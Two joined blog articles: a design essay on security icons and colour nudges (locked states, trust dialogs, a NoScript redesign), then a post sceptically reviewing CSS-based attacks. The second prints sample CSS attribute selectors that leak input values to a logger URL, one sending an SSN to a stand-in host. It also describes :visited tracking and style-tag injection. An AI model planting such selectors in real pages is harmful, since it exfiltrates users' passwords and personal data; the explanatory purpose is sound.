iconography-of-security

Congratulations, you’re locked out! The paradox of security visuals

Designers of technology are fortunate to have an established visual language at our fingertips. We try to use colors and symbols in a way that is consistent with people’s existing expectations. When a non-designer asks a designer to “make it intuitive,” what they’re really asking is, “please use elements people already know, even if the concept is new.”

Lots of options for security icons

We’re starting to see more consistency in the symbols that tech uses for privacy and security features, many of them built into robust, standardized icon sets and UI kits. To name a few: we collaborated with Adobe in 2018 to create the Vault UI Kit, which includes UI elements for security, like touch ID login and sending a secure copy of a file. Adobe has also released a UI kit for cookie banners.

A screenshot of an activity log.
Activity log from the Vault Secure UI Kit, by Adobe and Simply Secure.
A screenshot of a bright green cookie alert banner.
Cookie banner, from the Cookie Banner UI Kit, by Adobe.

Even UI kits that aren’t specialized in security and privacy include icons that can be used to communicate security concepts, like InVision’s Smart Home UI Kit. And, of course, nearly every icon set has security-related symbols, from Material Design to Iconic.

Five icons related to security, including a key, shield and padlock.
Key, lock, unlock, shield, and warning icons from Iconic.
Ten icons related to security, including more shields and padlocks.
A selection of security-related icons from Material Design.
A screenshot of a shield graphic being used in different apps.
Security shields from a selection of Chinese apps, 2014. From a longer essay by Dan Grover.

Many of these icons allude to physical analogies for the states and actions we’re trying to communicate. Locks and keys; shields for protection; warning signs and stop signs; happy faces and sad faces. Using these analogies helps build a bridge from the familiar, concrete world of door locks and keyrings to the unfamiliar, abstract realm of public- and private-key encryption.

A photo of a set of keys.
flickr/Jim Pennucci
A screenshot of a dialog from the GPG keychain app.
GPG Keychain, an open-source application for managing encryption keys. Image: tutsplus.com

When concepts don’t match up

Many of the concepts we’re working with are pairs of opposites. Locked or unlocked. Private or public. Trusted or untrusted. Blocked or allowed. Encouraged or discouraged. Good or evil. When those concept pairs appear simultaneously, however, we quickly run into UX problems.

Take the following example. Security is good, right? When something is locked, that means you’re being responsible and careful, and nobody else can access it. It’s protected. That’s cause for celebration. Being locked and protected is a good state.

An alert with a shield icon with a green tick that says 'account locked'.
“Congratulations, you’re locked out!”

Whoops.

If the user didn’t mean to lock something, or if the locked state is going to cause them any inconvenience, then extra security is definitely not good news.

Another case in point: Trust is good, right? Something trusted is welcome in people’s lives. It’s allowed to enter, not blocked, and it’s there because people wanted it there. So trusting and allowing something is good.

An alert with a download icon asking the user whether to trust this file, followed by an alert with a green download icon saying 'success'
“Good job, you’ve downloaded malware!”

Nope. Doesn’t work at all. What if we try the opposite colors and iconography?

An alert with a download icon asking the user whether to trust this file, followed by an alert with a red download icon saying 'success'

That’s even worse. Even though we, the designers, were trying both times to keep the user from downloading malware, the user’s actual behavior makes our design completely nonsensical.

Researchers from Google and UC Berkeley identified this problem in a 2016 USENIX paper analyzing connection security indicators. They pointed out that, when somebody clicks through a warning to an “insecure” website, the browser will show a “neutral or positive indicator” in the URL bar – leading them to think that the website is now safe. Unlike our example above, this may not look like nonsense from the user point of view, but from a security standpoint, suddenly showing “safe/good” without any actual change in safety is a pretty dangerous move.

The deeper issue

Now, one could file these phenomena under “mismatching iconography,” but we think there is a deeper issue here that concerns security UI in particular. Security interface design pretty much always has at least a whiff of “right vs. wrong.” How did this moralizing creep into an ostensibly technical realm?

Well, we usually have a pretty good idea what we’d like people to do with regards to security. Generally speaking, we’d like them to be more cautious than they are (at least, so long as we’re not trying to sneak around behind their backs with confusing consent forms and extracurricular data use). Our well-intentioned educational enthusiasm leads us to use little design nudges that foster better security practices, and that makes us reach into the realm of social and psychological signals. But these nudges can easily backfire and turn into total nonsense.

Another example: NoScript

“No UX designer would be dense enough to make these mistakes,” you might be thinking.

Well, we recently did a redesign of the open-source content-blocking browser extension NoScript, and we can tell you from experience: finding the right visual language for pairs of opposites was a struggle.

NoScript is a browser extension that helps you block potential malware from the websites you’re visiting. It needs to communicate a lot of states and actions to users. A single script can be blocked or allowed. A source of scripts can be trusted or untrusted. NoScript is a tool for the truly paranoid, so in general, wants to encourage blocking and not trusting. But:

“An icon with a crossed-out item is usually BAD, and a sign without anything is usually GOOD. But of course, here blocking something is actually GOOD, while blocking nothing is actually BAD. So whichever indicators NoScript chooses, they should either aim to indicate system state [allow/block] or recommendation [good/bad], but not both. And in any case, NoScript should probably stay away from standard colors and icons.”

So we ended up using hardly any of the many common security icons available. No shields, no alert! signs, no locked locks, no unlocked locks. And we completely avoided the red/green palette to keep from taking on unintended meaning.

Navigating the paradox

Security recommendations appear in most digital services are built nowadays. As we move into 2020, we expect to see a lot more conscious choice around colors, icons, and words related to security. For a start, Firefox already made a step in the right direction by streamlining indicators for SSL encryption as well as content blocking. (Spoilers: they avoided adding multiple dimensions of indicators, too!)

The most important thing to keep in mind, as you’re choosing language around security and privacy features, is: don’t conflate social and technical concepts. Trusting your partner is good. Trusting a website? Well, could be good, could be bad. Locking your bike? Good idea. Locking a file? That depends.

Think about the technical facts you’re trying to communicate. Then, and only then, consider if there’s also a behavioral nudge you want to send, and if you are, try to poke holes in your reasoning. Is there ever a case where your nudge could be dangerous? Colors, icons, and words give you a lot of control over how exactly people experience security and privacy features. Using them in a clear and consistent way will help people understand their choices and make more conscious decisions around security.

css-security-vulnerabilities

Don’t read that headline and get worried. I don’t think CSS is a particularly dangerous security concern and, for the most part, I don’t think you need to worry about it.

But every once in a while, articles tend to circulate and get some attention as to the possibilities of what CSS can do that might surprise or worry you.

Here’s a little roundup.

The Visited Link Concern

This one goes like this:

  1. You put a link to a particular page on your site, say Tickle Pigs
  2. You style the visited state of that link like a:visited { color: pink; } which is not a default user agent style.
  3. You test the computed style of that link.
  4. If it’s pink, this user is a pig tickler.
  5. You report that pig tickling information back to some server somewhere and presumably triple their pig owning insurance rates as surely the pigs will suffer extreme emotional distress over all the tickling.

You might even be able to do it entirely in CSS, because that :visited style might have like background-image: url(/data-logger/tickle.php); which is only requested by pig ticklers.

Worried? Don’t be, browsers have all prevented this from being possible.

The Keylogger

This one goes like this:

  1. There is an input on the page. Perhaps a password input. Scary!
  2. You put a logger script as the value for the input’s background image, but also one billion more selectors just like that such that the logger will collect and report some or all of the password.
input[value^="a"] { background: url(logger.php?v=a); }

This one isn’t that easy. The value attribute of an input doesn’t change just because you type into it. It does sometimes in frameworks like React though, so if you were to slip this CSS onto a login page powered by React and coded in that way then, theoretically, this CSS-powered keylogger could work.

But… in that case, JavaScript is executing on that page anyway. JavaScript is 1000× more concerning than CSS for things like this. A keylogger in JavaScript is just a couple of lines of code watching for keypress events and reporting them via Ajax.

Third-party and XSS injected inline JavaScript is now stoppable with Content Security Policy (CSP)… but so is CSS.

The Data Thief

This one goes like this:

  1. If I can get some of my nefarious CSS onto a page where you’ve authenticated into a site…
  2. And that site displays sensitive information like a social security number (SSN) in a pre-filled form…
  3. I can use attribute selectors to figure it out.
input#ssn[value="123-45-6789"] { background: url(https://secret-site.com/logger.php?ssn=123-45-6789); }

A billion selectors and you’ve covered all the possibilities!

The inline style block whoopsie

I don’t know if I’d blame CSS for this necessarily, but imagine:

Perhaps you’re allowing the user some CSS customization there. That’s an attack vector, as they could close that style tag, open a script tag, and write nefarious JavaScript.

I’m sure there are a bunch more

Got ’em? Share ’em.

Paint me a little skeptical of how terrified I should be about CSS security vulnerabilities. I don’t wanna downplay security things too much (especially third-party concerns) because I’m not an expert and security is of the utmost importance, but at the same time, I’ve never once heard of CSS being the attack vector for anything outside of a thought exercise. Educate me!